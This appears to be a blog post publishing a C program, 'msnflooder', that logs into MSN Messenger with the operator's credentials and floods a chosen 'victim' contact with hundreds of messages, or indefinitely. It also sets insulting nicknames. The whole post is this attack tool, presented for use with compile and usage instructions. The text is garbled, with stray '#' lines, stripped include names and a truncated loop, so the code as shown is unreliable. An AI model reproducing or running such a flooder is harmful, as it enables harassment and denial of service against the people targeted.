/***************************************************************************
#
* Copyright (C) 2007 by Dani (Rebootz, Jeet99 ecc... :-P) *
#
* cradle.dani|at|gmail.com *
#
* *
#
* This program is free software; you can redistribute it and/or modify *
#
* it under the terms of the GNU General Public License as published by *
#
* the Free Software Foundation; either version 2 of the License, or *
#
* any later version. *
#
* *
#
* This program is distributed in the hope that it will be useful, *
#
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#
* GNU General Public License for more details. *
#
* *
#
* Compiling: $ gcc -Wall msnflooder.c -o msnflooder -lssl *
#
* Usage: $ ./msnflooder -f -a victim@hotmail.com -r nickname *
#
* *
#
* [Victim must be in your contact list AND connected !] *
#
* *
#
***************************************************************************/
#
#
#include
#
#include
#
#include
#
#include
#
#define SIGINT 2
#
#
int isalnum (int c);
#
int close(int fd);
#
void _exit(int status);
#
char *getpass (const char* prompt);
#
#
int kill(pid_t pid, int sig);
#
pid_t wait (int* status);
#
#
#
BIO *bio_err = 0;
#
#
/* usage */
#
#
void usage (char* prgname)
#
{
#
fprintf (stdout, "\n"
#
"Usage: %s -a
#
"Victim must be in your contacts list and connected !\n\n"
#
"-a option set victim\n"
#
"-f option flood forever\n"
#
"-r option restore a nick name\n\n",
#
prgname);
#
_exit (2);
#
}
#
#
/* print an error to stderr and quit */
#
#
void _error (char* msg)
#
{
#
fprintf (stderr, "%s\n", msg);
#
_exit (-1);
#
}
#
#
/* receive other data */
#
#
void clean_sock (int sd)
#
{
#
char buff[1024];
#
int rval;
#
fd_set read_set;
#
struct timeval timeout;
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd+1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, sizeof buff - 1, 0);
#
}
#
return ;
#
}
#
#
/* verify a valid email address */
#
#
int verify_mail (char* account)
#
{
#
char* ptr;
#
unsigned short int l;
#
#
l = strlen (account);
#
#
if (l > 200)
#
_error ("WHAT ?!");
#
#
if ((ptr = strchr (account, '@')) == NULL || strchr (ptr, '.') == NULL)
#
return 1;
#
#
return 0;
#
}
#
#
/* read your account and password */
#
#
int get_data (char* account, char* pass, unsigned short size)
#
{
#
int set;
#
char* tmp;
#
#
fprintf (stdout, "Your account: ");
#
fflush (stdout);
#
fgets (account, size, stdin);
#
set = strlen (account) - 1;
#
* (account + set) = 0;
#
#
if (verify_mail (account))
#
{
#
fprintf (stderr, "\"%s\" isn't a valid email address.\n", account);
#
_exit (-1);
#
}
#
#
fprintf (stdout, "Your password: ");
#
fflush (stdout);
#
tmp = getpass ("");
#
if (strlen (tmp) > size - 1)
#
_error ("Password too long !?");
#
strcpy (pass, tmp);
#
#
return 0;
#
}
#
#
/* "encode" password; change only alphanumeric char in hex :D */
#
#
char* str_encode (char* str)
#
{
#
char* ret;
#
unsigned short len = strlen (str),
#
size = (len * 2 * sizeof (char)) + 1,
#
x, y;
#
#
if ((ret = (char*) malloc (size)) == NULL)
#
_error ("Cannot allocate memory.");
#
#
memset (ret, 0, size);
#
#
for (x=0, y=0; x
if (!isalnum (str[x]))
#
{
#
sprintf(&ret[y], "%%%x", str[x]);
#
y += 2;
#
} else
#
ret[y] = str[x];
#
#
return ret;
#
}
#
#
/* resolve a hostname, save type and length of address in
#
* 'type' and 'length' and return ip */
#
#
char* resolve (int* type, int* length, char* host)
#
{
#
struct hostent* name;
#
char buffer[1024];
#
#
if ((name = gethostbyname (host)) == NULL)
#
{
#
snprintf (buffer, sizeof buffer -1, "Cannot resolve %s.", host);
#
_error (buffer);
#
}
#
#
*type = name->h_addrtype;
#
*length = name->h_length;
#
return (char*) *name->h_addr_list;
#
}
#
#
/* initialize ssl */
#
#
SSL_CTX * initialize_ctx (void)
#
{
#
SSL_METHOD* method;
#
SSL_CTX* ctx;
#
#
if (!bio_err)
#
{
#
SSL_library_init ();
#
SSL_load_error_strings ();
#
bio_err = BIO_new_fp (stderr, BIO_NOCLOSE);
#
}
#
method = TLSv1_client_method ();
#
ctx = SSL_CTX_new (method);
#
#
return ctx;
#
}
#
#
/* connect to IP, request data and save result to 'buff' */
#
#
char* _ssl_connect ( char *request, /* request page */
#
int type, /* type of address */
#
int length, /* server length */
#
char* server, /* IP server */
#
unsigned short port, /* port to connect */
#
char *buff, /* saved received data */
#
unsigned short size) /* max size received data */
#
{
#
SSL_CTX* ctx;
#
SSL* ssl;
#
BIO* sbio;
#
struct sockaddr_in server_in;
#
int sock;
#
#
ctx = initialize_ctx();
#
#
server_in.sin_family = type;
#
server_in.sin_port = htons (port);
#
memcpy ((char*) &server_in.sin_addr.s_addr, server, length);
#
#
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if ((connect (sock, (struct sockaddr*) &server_in, sizeof server_in)) < 0)
#
_error ("Cannot connect to host.");
#
#
ssl = SSL_new (ctx);
#
sbio = BIO_new_socket (sock, BIO_NOCLOSE);
#
SSL_set_bio (ssl, sbio, sbio);
#
snprintf (buff, size, request);
#
#
if (SSL_connect (ssl) <= 0)
#
_error ("Cannot connect to SSL server.");
#
if (SSL_write (ssl, buff, strlen(buff)) < 1)
#
_error ("Cannot send SSL data.");
#
memset (buff, 0, size);
#
if (SSL_read (ssl, buff, size) <= 0)
#
_error ("Cannot receive SSL data.");
#
if (SSL_shutdown (ssl) < 0)
#
_error ("Cannot shutdown SSL connection.");
#
#
SSL_free (ssl);
#
SSL_CTX_free (ctx);
#
close (sock);
#
#
return buff;
#
#
}
#
#
/* resolve a name and send ssl request to it. If received data NOT start with
#
'assertion', print error_message to stderr and quit ! */
#
#
int _ssl_request (int* type, int* length, char* host, int port, char* request, char* buff, unsigned short size,
#
char* assertion, char* error_message)
#
{
#
char* server;
#
char buffer[1024];
#
#
if ((inet_ntop (*type, host, buffer, sizeof buffer - 1)) != NULL)
#
{
#
fprintf (stdout, "Connecting to %s and send request...", buffer);
#
fflush (stdout);
#
}
#
#
#
server = resolve (type, length, host); /* type and length here will be modied */
#
_ssl_connect (request, *type, *length, server, port, buff, size);
#
#
if (assertion != (char*) NULL && strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error (error_message);
#
#
fprintf (stdout, "OK\n");
#
#
return 0;
#
}
#
#
/* connect to msn server and return a socket descriptor; socket NO close ;) */
#
#
int msn_connect (char* server, unsigned short port, int family, int length)
#
{
#
#
struct sockaddr_in sock;
#
int sd;
#
char buffer[2][1024];
#
#
if (inet_ntop (family, server, buffer[0], sizeof buffer[0] - 1) != NULL)
#
fprintf (stdout, "Connecting to %s at port %u...", buffer[0], port);
#
#
fflush (stdout);
#
#
sock.sin_family = family;
#
sock.sin_port = htons (port);
#
memcpy ((char*) &sock.sin_addr.s_addr, server, length);
#
#
if ((sd = socket (family, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if (connect (sd, (struct sockaddr*) &sock, sizeof sock) < 0)
#
{
#
if (*buffer == (char*) NULL)
#
_error ("Cannot connect to server.");
#
else
#
{
#
snprintf (buffer[1], sizeof buffer[1] - 1, "Cannot connect to %s.", buffer[0]);
#
_error (buffer[1]);
#
}
#
}
#
#
printf ("OK.\n");
#
return sd;
#
}
#
#
/* send dato to a server, save result on 'buff' without "\r\n"; socket (sd) is ALREADY connect
#
if request is null JUST receive data */
#
#
int msn_request (int sd, int family, char* server,
#
char* request, char* buff, unsigned short size)
#
{
#
char *set, buffer[2][512];
#
int read = 0;
#
#
memset (buff, 0, size);
#
#
if (request != (char*) NULL)
#
if ((send (sd, request, strlen (request), 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot send request to %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
if ((read = recv (sd, buff, size, 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot receive data from %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
buff[read] = 0;
#
if ((set = strrchr (buff, '\r')) != NULL)
#
*set = 0;
#
#
return 0;
#
}
#
#
/* call msn_request() and initialize login */
#
#
int msn_start (int sd, int type, char* server, char* account, char* buff, unsigned short buff_size)
#
{
#
#
char request[buff_size];
#
#
snprintf (request, buff_size, "VER 1 MSNP11 CVR0\r\n");
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "USR 3 TWN I %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
#
return 0;
#
}
#
#
/* get from received data (data) new server ip end port. Save it in 'redirect' and 'port' */
#
#
int xfr_redirect (char* data, char* redirect, unsigned short size, unsigned short* port)
#
{
#
char *set, *cut;
#
#
if (strncmp (data, "XFR", 3) != 0 || (set = strstr (data, "NS ")) == NULL)
#
_error ("Cannot get server to redirect.");
#
set += 3; /* delete 'NS ' */
#
#
if ((cut = strchr (set, ' ')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* delete end of string */
#
#
if ((cut = strchr (set, ':')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* split host and port */
#
#
if (strlen (set) > size)
#
_error ("Server too big !?");
#
#
memcpy (redirect, set, size); /* copy ip of new server */
#
*port = (unsigned short) atoi (++cut); /* save new port */
#
#
fprintf (stdout, "New server received.\n Ip: %s\n Port: %u\n", redirect, *port);
#
#
return 0;
#
}
#
#
/* save id from USR message notification server...
#
MOST IMPORTANT this is required in TWINER authentication !!! */
#
#
int save_id (char* buff, char* id, unsigned short idsize)
#
{
#
char* ptr;
#
#
if ((ptr = strstr (buff, "lc=")) == NULL)
#
_error ("Cannot get id.");
#
if (strlen (ptr) > idsize)
#
_error ("ID too big !?");
#
#
strcpy (id, ptr);
#
#
return 0;
#
#
}
#
#
/* get host and page from NEXUS data in 'data'; page will save in 'page', IP server will save in host ! */
#
#
int nexus_redirect (char* buff, char* host, char* page, unsigned short sizes)
#
{
#
char *ptr, *set;
#
unsigned short size = sizes / 2;
#
#
if ((ptr = strstr (buff, "DALogin=")) == NULL || (set = strchr (ptr, '=')) == NULL)
#
_error ("Cannot get DALogin field.");
#
#
ptr = ++set ; /* delete 'DALogin=' */
#
#
if ((set = strchr (ptr, '/')) == NULL)
#
_error ("Cannot get hostname from NEXUS received data.");
#
#
*set = 0;
#
strncpy (host, ptr, size); /* save host */
#
#
set++;
#
ptr = set;
#
if ((set = strchr (ptr, ',')) == NULL)
#
_error ("Cannot get page from NEXUS received data.");
#
*set = 0;
#
#
strncpy (page, ptr, size);
#
#
fprintf (stdout, "New Host and Page obtained from NEXUS server.\n Server: %s\n Page: %s\n", host, page);
#
#
return 0;
#
}
#
#
/* get ticket from ssl server reply and save it in 'ticket' */
#
#
int save_ticket (char* reply, char* ticket, unsigned short ticket_size)
#
{
#
char* ptr, *t;
#
#
if ((ptr = strstr (reply, "Authentication-Info:")) == NULL || (t = strchr (ptr, '\'')) == NULL)
#
_error ("Cannot get passport ticket.");
#
#
ptr = ++t; /* delete ' char firts 't=' */
#
if ((t = strchr (ptr, '\'')) != NULL) /* cut ticket and replace with 0 */
#
*t = 0;
#
else
#
_error ("Unexpected error !");
#
#
if (strlen (ptr) > ticket_size)
#
_error ("Ticket too long !?");
#
#
snprintf (ticket, ticket_size, "%s\r\n", ptr);
#
#
fprintf (stdout, "OK, ticket received and saved.\n");
#
#
return 0;
#
}
#
#
/* authentication with TWINER */
#
#
int usr_receive (int sd, char* req, char* ticket, char* buff, unsigned short size, char* assertion)
#
{
#
int l, rval;
#
char *request;
#
#
memset (buff, 0, size);
#
#
l = strlen (req) + strlen (ticket) + 2;
#
if ((request = (char*) malloc (l * sizeof (char))) == NULL)
#
_error ("Cannot allocate memory for TWINER authentication send data.");
#
#
sprintf (request, "%s %s", req, ticket);
#
#
rval = send (sd, request, strlen (request), 0);
#
if (rval < 0)
#
_error ("Cannot send data !?");
#
#
if ((rval = recv (sd, buff, size - 1, 0)) < 0)
#
_error ("Cannot receive data !?");
#
#
buff[rval] = 0;
#
#
if (strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error ("Login failed.");
#
#
fprintf (stdout, "Login successfull.\n");
#
#
free (request);
#
request = NULL;
#
clean_sock (sd);
#
return 0;
#
}
#
#
/* syncronize with server and receive contacts list...We will ignore all... */
#
#
int syn_receive (int sd, char* request)
#
{
#
int rval;
#
char buff[2048];
#
fd_set read_set;
#
struct timeval timeout;
#
#
printf ("Syncronizing with server...");
#
fflush (stdout);
#
#
if (send (sd, request, strlen (request), 0) < 0)
#
{
#
printf ("Failed.\n");
#
_exit (-1);
#
}
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd + 1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select() call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, 2048, 0);
#
}
#
printf ("OK.\n");
#
return 0;
#
}
#
#
/* prepare to flood */
#
#
int init_msg (int sd, char* req, char* new_server, unsigned short server_size, unsigned short* port,
#
char* id, char* account, char* victim)
#
{
#
int sd_sb, read, type, length, size=2048;
#
char buff[size], *ptr, *set, *server, request[size];
#
#
clean_sock (sd);
#
#
if (send (sd, req, strlen (req), 0) < 0)
#
_error ("Cannot send request to start flood :-(");
#
#
fprintf (stdout, "\nInitialize flood...\n");
#
#
if ((read = recv (sd, buff, sizeof buff - 1, 0)) < 0)
#
_error ("Cannot receive data.");
#
#
buff[read] = 0;
#
#
/* read new server port and id */
#
#
if ((ptr = strstr (buff, "XFR 9 SB ")) == NULL || (set = strchr (ptr, ':')) == NULL)
#
_error ("Cannot read new server.");
#
ptr += strlen ("XFR 9 SB ");
#
*set = 0;
#
strncpy (new_server, ptr, server_size);
#
#
ptr = ++set;
#
if ((set = strchr (ptr, ' ')) == NULL)
#
_error ("Cannot read new port.");
#
*set = 0;
#
*port = atoi (ptr);
#
#
ptr = ++set;
#
if ((set = strstr (ptr, "CKI ")) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
ptr = set + strlen ("CKI ");
#
if ((set = strchr (ptr, '\n')) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
set++;
#
*set = 0; /* set NULL char after "\r\n" */
#
if (strlen (ptr) > size)
#
_error ("Data from XFR SB too long !?");
#
strcpy (id, ptr);
#
#
server = resolve (&type, &length, new_server);
#
sd_sb = msn_connect (server, *port, type, length);
#
#
snprintf (request, size, "USR 8 %s %s", account, id);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "USR 8 OK", 8) != 0)
#
_error ("Unexpected error. Try again please !");
#
#
fprintf (stdout, "Calling %s...", victim);
#
fflush (stdout);
#
#
snprintf (request, size, "CAL 10 %s\r\n", victim);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "CAL 10 RINGING", 13) != 0)
#
{
#
if (!strncmp (buff, "217", 3))
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" don't exist in your contacts list or is offline/hide.\n", victim);
#
_error (buff);
#
}
#
else
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" is invalid !?.\n", victim);
#
_error (buff);
#
}
#
}
#
#
puts ("OK.");
#
msn_request (sd_sb, type, server, NULL, buff, size); /* receive only other data... */
#
if (strncmp (buff, "JOI", 3) != 0)
#
_error ("JOI command not received !?");
#
#
return sd_sb; /* return socket descriptor */
#
}
#
#
int send_msg (int sd_sb, unsigned short force)
#
{
#
static const char header[] = "MIME-Version: 1.0\r\n"
#
"Content-Type: text/plain; charset=UTF-8\r\n"
#
"X-MMS-IM-Format: FN=Arial; EF=I; CO=0; CS=0; PF=22\r\n"
#
"\r\n";
#
#
char tmp[1003];
#
char msg[1500];
#
char *set;
#
unsigned cnt, len;
#
pid_t pid;
#
#
memset (msg, 0, sizeof msg);
#
#
fprintf (stdout, "\nFlooding%s...", (!force) ? "" : ", press Enter for stop");
#
fflush (stdout);
#
#
cnt = 0;
#
len = sizeof (tmp) - 3;
#
memset (tmp, 0, len);
#
#
while (cnt < len)
#
{
#
strcat (tmp, "\r\n");
#
cnt += 2;
#
}
#
set = strrchr (tmp, '\r');
#
if (set) *set = 0;
#
strcat (tmp, "\r\n");
#
len = strlen (header) + strlen (tmp);
#
#
sprintf (msg, "MSG 11 N %d\r\n"
#
"%s%s", len, header, tmp);
#
#
cnt = 0;
#
pid = fork();
#
#
if (pid < 0)
#
_error ("Unexpected error.");
#
else if (!pid)
#
{
#
while (cnt < 1500)
#
{
#
if (send (sd_sb, msg, strlen (msg), 0) < 0)
#
_error ("Cannot send message.");
#
if (!force) /* if 'force' parameter is true flood forever... */
#
cnt++;
#
}
#
_exit (0);
#
}
#
else
#
{
#
if (force)
#
{
#
int c;
#
while (1)
#
if ((c = getchar()) == '\n')
#
{
#
fprintf (stdout, "Stopping flood...");
#
fflush (stdout);
#
if (kill (pid, SIGINT) < 0)
#
_error ("Cannot kill child.");
#
else
#
break;
#
}
#
}
#
else
#
wait (0);
#
}
#
#
puts ("OK");
#
return 0;
#
}
#
#
int login_redirection ( char* server, char* page, char* buff, unsigned short size,
#
int* type, int* length, char* request)
#
{
#
char *set, *off;
#
#
fprintf (stdout, "Redirected to another server.\n");
#
#
if ((set = strstr (buff, "Location: ")) == NULL)
#
_error ("Cannot get new server.");
#
#
set += strlen ("Location: ");
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new server.");
#
#
while (*off == '/') off++;
#
set = off;
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new page.");
#
#
*off = 0;
#
off++;
#
#
strncpy (server, set, 512); /* 512 is size of server and page */
#
#
set = off;
#
if ((off = strchr (set, '\r')) != NULL)
#
*off = 0;
#
#
strncpy (page, set, 512); /* 512 is size of server and page */
#
#
fprintf (stdout, " Server: %s\n Page: %s\n", server, page);
#
#
_ssl_request ( type, length, server, 443, request,
#
buff, size, (char*) NULL, "Unauthorized.");
#
#
if (strncmp (buff, "HTTP/1.1 200 OK", 15))
#
{
#
puts ("\nPlease report this Error:\n");
#
_error (buff);
#
}
#
#
return 0;
#
}
#
#
int main (int argc, char** argv){
#
#
int sd, sd_sb, type, length;
#
unsigned short buff_size = 4096, port = 0, force_flood = 0;
#
char c, *server=NULL,
#
account[200], pass[200], *e_pass=NULL, *victim=NULL,
#
buff[buff_size], id[buff_size], id_sb[buff_size], nexus_redir[2][512], request[buff_size], ticket[buff_size],
#
xfr_server[50], xfr_sb_server[50], *rnick;
#
#
if (argc < 3 || argc > 6) usage (*argv);
#
#
while ((c = getopt (argc, argv, "a:r:fh")) != -1)
#
{
#
switch (c)
#
{
#
case 'a': victim = strdup (optarg);
#
if (victim == NULL) _error ("Cannot allocate memory.");
#
break;
#
case 'f': force_flood = 1;
#
break;
#
case 'h': usage (*argv);
#
break;
#
case 'r': rnick = strdup (optarg);
#
if (rnick == NULL) _error ("Cannot allocate memory.");
#
break;
#
case '?':
#
if (optopt == 'a' || optopt == 'r')
#
{
#
fprintf (stderr, "\nOption -%c requires an argument.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
else
#
{
#
fprintf (stderr, "\nUnknow -%c option.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
}
#
}
#
#
if (!victim) usage (*argv);
#
#
get_data (account, pass, 200);
#
putchar ('\n');
#
server = resolve (&type, &length, "messenger.hotmail.com");
#
sd = msn_connect (server, 1863, type, length);
#
msn_start (sd, type, server, account, buff, buff_size);
#
close (sd); /* close connection */
#
fprintf (stdout, "Connection close.\n");
#
xfr_redirect (buff, xfr_server, sizeof (xfr_server) - 1, &port); /* get new server and port */
#
server = resolve (&type, &length, xfr_server);
#
sd = msn_connect (server, 1863, type, length); /* connecting to new server */
#
msn_start (sd, type, server, account, buff, buff_size);
#
#
save_id (buff, id, buff_size); /* save id required by nexus authentication */
#
e_pass = str_encode (pass);
#
#
fprintf (stdout, "Incoming TWEENER Authentication.\n");
#
#
_ssl_request (&type, &length, "nexus.passport.com", 443,
#
"GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n",
#
buff, buff_size,
#
"HTTP/1.1 200 OK", "Bad NEXUS reply.");
#
#
nexus_redirect (buff, nexus_redir[0], nexus_redir[1], sizeof (nexus_redir) - 1);
#
#
snprintf (request, buff_size,
#
"GET /%s HTTP/1.1\r\n"
#
"Authorization: Passport1.4 OrgVerb=GET,"
#
"OrgURL=http%%3A%%2F%%2Fmessenger%%2Emsn%%2Ecom,"
#
"sign-in=%s,pwd=%s,%s"
#
"User-Agent: MSMSGS\r\n"
#
"Host: %s\r\n"
#
"Connection: Keep-Alive\r\n"
#
"Cache-Control: no-cache\r\n\r\n",
#
nexus_redir[1], account, e_pass, id, nexus_redir[0]);
#
#
_ssl_request ( &type, &length, nexus_redir[0], 443, request,
#
buff, buff_size, (char*) NULL, "Unauthorized.");
#
#
if (!strncmp (buff, "HTTP/1.1 200 OK", 15))
#
;
#
else if (!strncmp (buff, "HTTP/1.1 302 Found", 18)) /* redirection... */
#
login_redirection ( nexus_redir[0], nexus_redir[1], buff, buff_size,
#
&type, &length, request);
#
else
#
_error ("\nUnauthorized.\n");
#
#
save_ticket (buff, ticket, sizeof ticket - 1);
#
usr_receive (sd, "USR 4 TWN S", ticket, buff, buff_size, "USR 4 OK");
#
syn_receive (sd, "SYN 5 0 0\r\n");
#
msn_request (sd, type, server, "PRP 6 MFN SPAMMER\r\n", buff, buff_size); /* set new nick name */
#
msn_request (sd, type, server, "CHG 7 NLN 0 0\r\n", buff, buff_size); /* set online status */
#
msn_request (sd, type, server, "PRP 8 MFN MSN%20SHIT%20SHIT%20SHIT%20!!!\r\n", buff, buff_size); /* set new nick name */
#
sd_sb = init_msg (sd, "XFR 9 SB\r\n", xfr_sb_server, sizeof (xfr_sb_server) - 1, &port, id_sb, account, victim);
#
send_msg (sd_sb, force_flood);
#
close (sd_sb);
#
#
snprintf (request, buff_size, "PRP 12 MFN %s\r\n", (rnick == NULL) ? account : rnick);
#
msn_request (sd, type, server, request, buff, buff_size); /* restore nick name */
#
msn_request (sd, type, server, "OUT\r\n", buff, buff_size); /* quit */
#
close (sd);
#
#
fprintf (stdout, "\n\n Finish ! :-))\n\n");
#
#
return 0;
#
}
0 comments:
Post a Comment